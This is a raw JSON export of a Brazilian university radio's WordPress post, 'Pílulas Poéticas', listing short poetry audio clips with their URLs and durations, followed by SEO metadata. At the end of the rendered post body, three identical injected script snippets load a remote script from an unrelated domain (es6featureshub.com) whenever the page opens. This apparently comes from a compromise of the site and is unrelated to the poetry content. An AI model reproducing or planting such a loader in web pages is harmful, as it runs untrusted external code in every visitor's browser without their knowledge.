Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:00\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-PARA-CONTAR-SILENCIOS.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"PARA CONTAR SILENCIOS\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - PARA CONTAR SILENCIOS\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:01\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-ORACAO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"ORA\\u00c7\\u00c3O\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - ORA\\u00c7\\u00c3O\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:08\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-O-POETA-E-UMIMPOSTOR.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"O POETA \\u00c9 UMIMPOSTOR\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - O POETA \\u00c9 UMIMPOSTOR\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"0:56\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-O-PALACIO-DA-AVENTURA.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"O PALACIO DA AVENTURA\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - O PALACIO DA AVENTURA\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:15\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-O-MORCEGO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"O MORCEGO\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - O MORCEGO\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:16\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-O-MENINO-QUE-CARREGAVA-AGUA-NO-PANEIRO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"O MENINO QUE CARREGAVA AGUA NO PANEIRO\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - O MENINO QUE CARREGAVA AGUA NO PANEIRO\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"2:05\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-O-FILHO-DO-SECULO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"O FILHO DO SECULO\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - O FILHO DO SECULO\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:37\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-O-APANHADOR-DE-DESPERDICIOS.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"O APANHADOR DE DESPERDICIOS\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - O APANHADOR DE DESPERDICIOS\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:32\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-O-AMOR-E-O-OUTRO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"O AMOR E O OUTRO\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - O AMOR E O OUTRO\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"0:53\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-O-ACENDEDOR-DE-LAMPIAO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"O ACENDEDOR DE LAMPI\\u00c3O\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - O ACENDEDOR DE LAMPI\\u00c3O\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:14\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-NOCOES.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"NO\\u00c7\\u00d5ES\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - NO\\u00c7\\u00d5ES\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:17\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-NO-CAMINHO-COM-MAYAKOVISK.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"NO CAMINHO COM MAYAKOVISK\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - NO CAMINHO COM MAYAKOVISK\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"0:01\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-MEU-DESTINO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"MEU DESTINO\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - MEU DESTINO\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:01\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-MARCIA-KAMBEBA-12..mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"MARCIA KAMBEBA - 12.\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - MARCIA KAMBEBA - 12.\\\".\",\"meta\":{\"length_formatted\":\"1:23\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-MARCIA-KAMBEBA-11..mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"MARCIA KAMBEBA - 11.\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - MARCIA KAMBEBA - 11.\\\".\",\"meta\":{\"length_formatted\":\"1:30\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-MARCIA-KAMBEBA-10..mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"MARCIA KAMBEBA - 10.\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - MARCIA KAMBEBA - 10.\\\".\",\"meta\":{\"length_formatted\":\"2:55\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-MARCIA-KAMBEBA-09..mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"MARCIA KAMBEBA - 09.\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - MARCIA KAMBEBA - 09.\\\".\",\"meta\":{\"length_formatted\":\"1:17\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-MARCIA-KAMBEBA-08..mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"MARCIA KAMBEBA - 08.\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - MARCIA KAMBEBA - 08.\\\".\",\"meta\":{\"length_formatted\":\"1:43\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-MARCIA-KAMBEBA-07..mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"MARCIA KAMBEBA - 07.\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - MARCIA KAMBEBA - 07.\\\".\",\"meta\":{\"length_formatted\":\"1:50\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-MARCIA-KAMBEBA-06..mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"MARCIA KAMBEBA - 06.\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - MARCIA KAMBEBA - 06.\\\".\",\"meta\":{\"length_formatted\":\"1:07\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-MARCIA-KAMBEBA-05..mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"MARCIA KAMBEBA - 05.\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - MARCIA KAMBEBA - 05.\\\".\",\"meta\":{\"length_formatted\":\"1:20\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-MARCIA-KAMBEBA-04..mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"MARCIA KAMBEBA - 04.\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - MARCIA KAMBEBA - 04.\\\".\",\"meta\":{\"length_formatted\":\"1:20\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-MARCIA-KAMBEBA-03..mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"MARCIA KAMBEBA - 03.\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - MARCIA KAMBEBA - 03.\\\".\",\"meta\":{\"length_formatted\":\"1:14\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-MARCIA-KAMBEBA-02..mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"MARCIA KAMBEBA - 02.\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - MARCIA KAMBEBA - 02.\\\".\",\"meta\":{\"length_formatted\":\"1:14\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-MARCIA-KAMBEBA-01..mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"MARCIA KAMBEBA - 01.\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - MARCIA KAMBEBA - 01.\\\".\",\"meta\":{\"length_formatted\":\"1:45\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-INTIMIDADE.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"INTIMIDADE\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - INTIMIDADE\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:09\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-GANHOS.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"GANHOS\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - GANHOS\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:10\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-FALA.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"FALA\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - FALA\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:04\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-EU-OUCO-MUSICA.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"EU OU\\u00c7O MUSICA\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - EU OU\\u00c7O MUSICA\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"0:58\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-ESTA-PRESA-A-VERDADE.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"EST\\u00c1 PRESA A VERDADE\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - EST\\u00c1 PRESA A VERDADE\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"0:59\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-ENSINAMENTO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"ENSINAMENTO\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - ENSINAMENTO\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:00\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-DOCE-ENGANO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"DOCE ENGANO\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - DOCE ENGANO\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:09\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}}]}<\/script>\n<\/div>\n\t\n<\/div>\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"P\u00edlulas Po\u00e9ticas\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/\" aria-label=\"Read more about P\u00edlulas Po\u00e9ticas\">Ler mais<\/a><\/p>\n","protected":false},"author":16,"featured_media":9363,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[737],"tags":[],"class_list":["post-8341","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-interprogramas"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>P\u00edlulas Po\u00e9ticas - Radio Web UFPA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"P\u00edlulas Po\u00e9ticas - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"... Ler mais\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2021-05-25T14:25:15+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T14:33:06+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/belem_destacado.png?fit=1080%2C1080&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1080\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Isaac Gomes\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Isaac Gomes\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/\"},\"author\":{\"name\":\"Isaac Gomes\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/fca55d052dba7f58491528e32dd066e4\"},\"headline\":\"P\u00edlulas 